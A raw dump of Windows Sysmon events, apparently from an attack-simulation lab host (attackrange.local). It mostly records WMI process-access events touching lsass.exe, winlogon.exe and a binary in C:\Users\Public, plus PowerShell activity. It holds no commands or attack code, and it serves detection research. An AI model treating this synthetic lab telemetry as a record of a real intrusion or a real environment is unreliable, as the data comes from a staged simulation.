15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023978Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023977Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023976Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023975Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023974Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023973Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023972Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023971Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023970Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023969Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023968Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023967Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023966Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023965Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023964Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024389Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.898{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024388Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.898{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024387Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.851{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024386Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.851{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000024385Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.819{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ezfiktqp.0qw.ps12021-01-20 15:59:23.819 10341000x800000000000000024384Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.804{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535B-6008-4B06-00000000A301}6040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024383Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.757{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-535B-6008-4C06-00000000A301}5212C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024382Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 